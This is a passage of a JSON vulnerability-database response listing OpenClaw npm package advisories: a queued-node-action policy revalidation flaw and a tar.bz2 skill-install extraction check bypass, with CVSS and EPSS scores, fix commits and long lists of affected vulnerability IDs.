e-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-pj41-sunw-vbcj"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vfbb-bpy9-87ey"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.31"}],"aliases":["CVE-2026-41403","GHSA-3xv9-89fm-7h4r"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-watb-49vx-yub1"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/91185?format=json","vulnerability_id":"VCID-wfkm-7ayk-uuhb","summary":"OpenClaw may have stale policy enforcement for queued node actions\n## Summary\nQueued node actions were not revalidated against current command policy when later delivered, so stale allowlists or declarations could survive policy tightening.\n\n## Affected Packages / Versions\n- Package: `openclaw` (npm)\n- Affected: < 2026.3.22\n- Fixed: >= 2026.3.22\n- Latest released tag checked: `v2026.3.23-2` (`630f1479c44f78484dfa21bb407cbe6f171dac87`)\n- Latest published npm version checked: `2026.3.23-2`\n\n## Fix Commit(s)\n- `ec2c6d83b9f5f91d6d9094842e0f19b88e63e3e2`\n\n## Release Status\nThe fix shipped in `v2026.3.22` and remains present in `v2026.3.23` and `v2026.3.23-2`.\n\n## Code-Level Confirmation\n- src/gateway/server-methods/nodes.ts now revalidates queued actions against the current allowlist and declared command set at delivery time.\n- src/gateway/server-methods/nodes.invoke-wake.test.ts includes the shipped stale-queue regression coverage.\n\nOpenClaw thanks @zpbrent for reporting.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-35648","reference_id":"","reference_type":"","scores":[{"value":"0.00035","scoring_system":"epss","scoring_elements":"0.10859","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00035","scoring_system":"epss","scoring_elements":"0.10896","published_at":"2026-06-06T12:55:00Z"},{"value":"0.00035","scoring_system":"epss","scoring_elements":"0.10907","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-35648"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"3.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N"},{"value":"2.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:P/PR:L/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/630f1479c44f78484dfa21bb407cbe6f171dac87","reference_id":"","reference_type":"","scores":[{"value":"3.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N"},{"value":"2.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:P/PR:L/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-13T17:46:09Z/"}],"url":"https://github.com/openclaw/openclaw/commit/630f1479c44f78484dfa21bb407cbe6f171dac87"},{"reference_url":"https://github.com/openclaw/openclaw/commit/ec2c6d83b9f5f91d6d9094842e0f19b88e63e3e2","reference_id":"","reference_type":"","scores":[{"value":"3.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N"},{"value":"2.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:P/PR:L/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-13T17:46:09Z/"}],"url":"https://github.com/openclaw/openclaw/commit/ec2c6d83b9f5f91d6d9094842e0f19b88e63e3e2"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-wj55-88gf-x564","reference_id":"","reference_type":"","scores":[{"value":"3.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N"},{"value":"LOW","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"2.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:P/PR:L/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-13T17:46:09Z/"}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-wj55-88gf-x564"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-35648","reference_id":"","reference_type":"","scores":[{"value":"3.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N"},{"value":"2.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:P/PR:L/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-35648"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-policy-bypass-via-unvalidated-queued-node-actions","reference_id":"","reference_type":"","scores":[{"value":"3.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N"},{"value":"2.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:P/PR:L/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-13T17:46:09Z/"}],"url":"https://www.vulncheck.com/advisories/openclaw-policy-bypass-via-unvalidated-queued-node-actions"},{"reference_url":"https://github.com/advisories/GHSA-wj55-88gf-x564","reference_id":"GHSA-wj55-88gf-x564","reference_type":"","scores":[{"value":"LOW","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-wj55-88gf-x564"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/109983?format=json","purl":"pkg:npm/openclaw@2026.3.22","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1j3m-fecr-f7cn"},{"vulnerability":"VCID-1p3b-pfnn-x7ad"},{"vulnerability":"VCID-1p5p-eth5-3ufu"},{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-1smq-mbty-jkaj"},{"vulnerability":"VCID-24m7-jx1g-hqde"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-26kp-dbu2-pqej"},{"vulnerability":"VCID-26sg-e29u-hkf3"},{"vulnerability":"VCID-26sv-grsd-abcw"},{"vulnerability":"VCID-294z-6z8j-97bx"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2hca-3v8f-f3e8"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-2uqu-k42d-1baq"},{"vulnerability":"VCID-2v8n-mnws-jfc9"},{"vulnerability":"VCID-2wr9-h42m-a7ev"},{"vulnerability":"VCID-32zs-2zs9-uufs"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-37ep-9smd-zuh9"},{"vulnerability":"VCID-384t-z1h8-pfft"},{"vulnerability":"VCID-38g8-39ek-xbat"},{"vulnerability":"VCID-3bdd-a9nw-13bn"},{"vulnerability":"VCID-3wsw-d4z2-dydt"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-3zx4-t8cj-kbfn"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4hz5-f2pw-3yb4"},{"vulnerability":"VCID-4jwj-6s5z-wbeq"},{"vulnerability":"VCID-4nwq-14y4-xkhp"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4uqc-3h1c-4yhs"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-5atj-2a7b-57g5"},{"vulnerability":"VCID-5rgx-2krs-guck"},{"vulnerability":"VCID-6849-th74-yqd5"},{"vulnerability":"VCID-6bxd-kbse-sudx"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7dyw-9b37-yqh4"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7wmr-v7zb-6fc9"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-8uzb-xmf8-hbca"},{"vulnerability":"VCID-8z7r-a8dv-eueb"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9jjv-aa8k-rke1"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9pj9-7b12-jbea"},{"vulnerability":"VCID-9uyu-y9qv-u7e1"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-9xrt-mv81-3yc8"},{"vulnerability":"VCID-9yxw-fj1c-tff9"},{"vulnerability":"VCID-a2p8-ydn6-3bbr"},{"vulnerability":"VCID-a2wx-7b8h-c3h1"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-atn7-pn13-3fgb"},{"vulnerability":"VCID-axp9-mt9z-gkgw"},{"vulnerability":"VCID-aye6-1fwu-nkc5"},{"vulnerability":"VCID-b9w3-w2nq-cqg6"},{"vulnerability":"VCID-bg1d-gmxy-wkc6"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bk76-1ctt-tkaw"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-bnfh-rsk9-cfea"},{"vulnerability":"VCID-brfj-4shr-qkgc"},{"vulnerability":"VCID-bumq-54sb-6ua7"},{"vulnerability":"VCID-bzw7-yvu2-yqa2"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-c4yt-z48z-zygv"},{"vulnerability":"VCID-c76v-4577-n7c6"},{"vulnerability":"VCID-carm-gpgh-wbbf"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-csnc-r6fv-j3en"},{"vulnerability":"VCID-cvmw-sxfq-dyhz"},{"vulnerability":"VCID-cvxu-rdbu-abd2"},{"vulnerability":"VCID-cwd3-ecym-sfaw"},{"vulnerability":"VCID-d3qp-5wm9-aqfp"},{"vulnerability":"VCID-d864-qy75-c3dx"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-da47-zdf1-mfgf"},{"vulnerability":"VCID-dbcw-brhj-k7hs"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-djqx-bwuu-4uc1"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-fekn-d6f3-xfa6"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-g3hg-peh1-tudm"},{"vulnerability":"VCID-g8r6-x6s5-uydq"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-gvam-2net-8kc5"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hd4w-s3dp-nubj"},{"vulnerability":"VCID-hkqd-6khg-m3hj"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-j8fb-fhyc-33fu"},{"vulnerability":"VCID-j92n-5217-9bhj"},{"vulnerability":"VCID-j96c-kau3-7fag"},{"vulnerability":"VCID-jbwa-scg3-efeq"},{"vulnerability":"VCID-jdqk-kv8u-xqa9"},{"vulnerability":"VCID-jhah-j2td-t3dp"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-jtxm-z4vv-cqg7"},{"vulnerability":"VCID-k3up-1vdf-2uh9"},{"vulnerability":"VCID-k52b-966p-ybbk"},{"vulnerability":"VCID-k5da-7tht-w3bs"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kzgh-7f6h-kfd1"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mcz5-wgu1-z7g7"},{"vulnerability":"VCID-mggy-bv5s-5uax"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nfva-pukn-uqch"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7me-4bzz-83cm"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pa1f-qzsh-efa9"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pc9z-x5wk-8ue7"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-q9jf-srt4-fbcg"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-qjvc-etb4-qbfv"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-r9y1-z2ax-z3e2"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-s3wz-3yzf-ybhz"},{"vulnerability":"VCID-sja9-6t41-hud8"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-t991-75e7-ykdv"},{"vulnerability":"VCID-te8f-snty-j7hh"},{"vulnerability":"VCID-tf28-1z2z-5yfn"},{"vulnerability":"VCID-tk9h-nqrz-uugp"},{"vulnerability":"VCID-u1ru-vdfp-x3hu"},{"vulnerability":"VCID-u6hw-ffpj-4yd9"},{"vulnerability":"VCID-u9cw-crg5-1kbs"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-uy97-p1ex-y7df"},{"vulnerability":"VCID-v1bp-hw9a-yffz"},{"vulnerability":"VCID-v91b-1nmx-ckcx"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vfbb-bpy9-87ey"},{"vulnerability":"VCID-vktg-77tu-vycv"},{"vulnerability":"VCID-vm8g-hrvu-quhm"},{"vulnerability":"VCID-vqrj-z6tx-rff2"},{"vulnerability":"VCID-vtqt-bgz7-yub6"},{"vulnerability":"VCID-vx5d-3d98-7kf3"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2rd-2j4p-gfgw"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-watb-49vx-yub1"},{"vulnerability":"VCID-wkye-je9r-1fba"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wut7-y72y-9ucb"},{"vulnerability":"VCID-wx44-n3fr-skah"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-x4hn-ygbg-mkep"},{"vulnerability":"VCID-x794-wfnf-1ugf"},{"vulnerability":"VCID-x7uw-s9a6-fybd"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xpr3-hg3h-z3bz"},{"vulnerability":"VCID-xryt-a83q-q7et"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-xvhd-w4tv-tqhr"},{"vulnerability":"VCID-xz8s-hj5s-wfgj"},{"vulnerability":"VCID-xzg5-ren5-p7gw"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ykwt-tdpa-3bft"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-ynup-4v9e-tbh4"},{"vulnerability":"VCID-yp2w-pc58-9bf6"},{"vulnerability":"VCID-ywrn-52gx-f3ad"},{"vulnerability":"VCID-z7wa-tw2t-vqas"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-zac2-wjyt-27af"},{"vulnerability":"VCID-zb5t-hhkm-kfeh"},{"vulnerability":"VCID-zf3q-78js-k7ce"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zkum-rn42-yyfs"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.22"}],"aliases":["CVE-2026-35648","GHSA-wj55-88gf-x564"],"risk_score":1.6,"exploitability":"0.5","weighted_severity":"3.3","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-wfkm-7ayk-uuhb"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/50655?format=json","vulnerability_id":"VCID-wfsp-szhr-r7eu","summary":"OpenClaw skills-install-download: tar.bz2 extraction bypassed archive safety parity checks (local DoS)\nThe `tar.bz2` installer path in `src/agents/skills-install-download.ts` used shell tar preflight/extract logic that did not share the same hardening guarantees as the centralized archive extractor.\n\nThis allowed crafted `.tar.bz2` archives to bypass special-entry blocking and extracted-size guardrails enforced on other archive paths, causing local availability impact during skill install.","references":[{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"5.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/0dbb92dd2bcf9a32379d11c0f11ed016669dae3e","reference_id":"","reference_type":"","scores":[{"value":"5.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/commit/0dbb92dd2bcf9a32379d11c0f11ed016669dae3e"},{"reference_url":"https://github.com/advisories/GHSA-77hf-7fqf-f227","reference_id":"GHSA-77hf-7fqf-f227","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-77hf-7fqf-f227"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-77hf-7fqf-f227","reference_id":"GHSA-77hf-7fqf-f227","reference_type":"","scores":[{"value":"5.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-77hf-7fqf-f227"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/74401?format=json","purl":"pkg:npm/openclaw@2026.3.2","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-11dg-bvft-6kb1"},{"vulnerability":"VCID-1728-wc17-dud6"},{"vulnerability":"VCID-1j3m-fecr-f7cn"},{"vulnerability":"VCID-1kk2-t48u-zkb2"},{"vulnerability":"VCID-1p3b-pfnn-x7ad"},{"vulnerability":"VCID-1p5p-eth5-3ufu"},{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-1smq-mbty-jkaj"},{"vulnerability":"VCID-1ufd-uuqk-nbdv"},{"vulnerability":"VCID-1y7e-y41k-qyfc"},{"vulnerability":"VCID-21eb-723m-xkfu"},{"vulnerability":"VCID-24eb-5jt8-aueq"},{"vulnerability":"VCID-24m7-jx1g-hqde"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-26kp-dbu2-pqej"},{"vulnerability":"VCID-26sg-e29u-hkf3"},{"vulnerability":"VCID-26sv-grsd-abcw"},{"vulnerability":"VCID-2927-2whr-sudd"},{"vulnerability":"VCID-294z-6z8j-97bx"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2hca-3v8f-f3e8"},{"vulnerability":"VCID-2jsx-pvnr-6ydn"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-2uqu-k42d-1baq"},{"vulnerability":"VCID-2v8n-mnws-jfc9"},{"vulnerability":"VCID-2wr9-h42m-a7ev"},{"vulnerability":"VCID-32zs-2zs9-uufs"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-37ep-9smd-zuh9"},{"vulnerability":"VCID-384t-z1h8-pfft"},{"vulnerability":"VCID-38g8-39ek-xbat"},{"vulnerability":"VCID-3bdd-a9nw-13bn"},{"vulnerability":"VCID-3pqp-bneb-mbc4"},{"vulnerability":"VCID-3qbe-dsde-p7dz"},{"vulnerability":"VCID-3wsw-d4z2-dydt"},{"vulnerability":"VCID-3xeb-phgc-vkcg"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-3zx4-t8cj-kbfn"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-44hp-3xh1-uyen"},{"vulnerability":"VCID-4hz5-f2pw-3yb4"},{"vulnerability":"VCID-4jwj-6s5z-wbeq"},{"vulnerability":"VCID-4nwq-14y4-xkhp"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4uqc-3h1c-4yhs"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-5atj-2a7b-57g5"},{"vulnerability":"VCID-5rgx-2krs-guck"},{"vulnerability":"VCID-5s6h-u8x6-myfk"},{"vulnerability":"VCID-5u41-c7kc-u7fe"},{"vulnerability":"VCID-6849-th74-yqd5"},{"vulnerability":"VCID-6bxd-kbse-sudx"},{"vulnerability":"VCID-6rha-8r5p-jyb7"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-74bc-hfqh-cbcd"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7dyw-9b37-yqh4"},{"vulnerability":"VCID-7gju-19nh-7bgu"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7wmr-v7zb-6fc9"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-816s-45wb-83ce"},{"vulnerability":"VCID-849r-t5j1-vue8"},{"vulnerability":"VCID-84fd-3yvx-rfgq"},{"vulnerability":"VCID-84v2-s1yq-rkfr"},{"vulnerability":"VCID-8aek-6dw1-tudj"},{"vulnerability":"VCID-8uzb-xmf8-hbca"},{"vulnerability":"VCID-8v2w-jgh7-6ybq"},{"vulnerability":"VCID-8z7r-a8dv-eueb"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9jjv-aa8k-rke1"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9pj9-7b12-jbea"},{"vulnerability":"VCID-9uyu-y9qv-u7e1"},{"vulnerability":"VCID-9v6f-dbmk-jygq"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-9xrt-mv81-3yc8"},{"vulnerability":"VCID-a2p8-ydn6-3bbr"},{"vulnerability":"VCID-a2t8-px5b-nfgd"},{"vulnerability":"VCID-a2wx-7b8h-c3h1"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-aawy-8xg4-1uen"},{"vulnerability":"VCID-ad1h-m5fz-f3hu"},{"vulnerability":"VCID-afkf-r949-dkgu"},{"vulnerability":"VCID-aja9-wzp2-kbcj"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-asuy-amja-eyd4"},{"vulnerability":"VCID-atn7-pn13-3fgb"},{"vulnerability":"VCID-axp9-mt9z-gkgw"},{"vulnerability":"VCID-aye6-1fwu-nkc5"},{"vulnerability":"VCID-b7hq-mrhg-b3bk"},{"vulnerability":"VCID-b9w3-w2nq-cqg6"},{"vulnerability":"VCID-bg1d-gmxy-wkc6"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bk76-1ctt-tkaw"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-bnfh-rsk9-cfea"}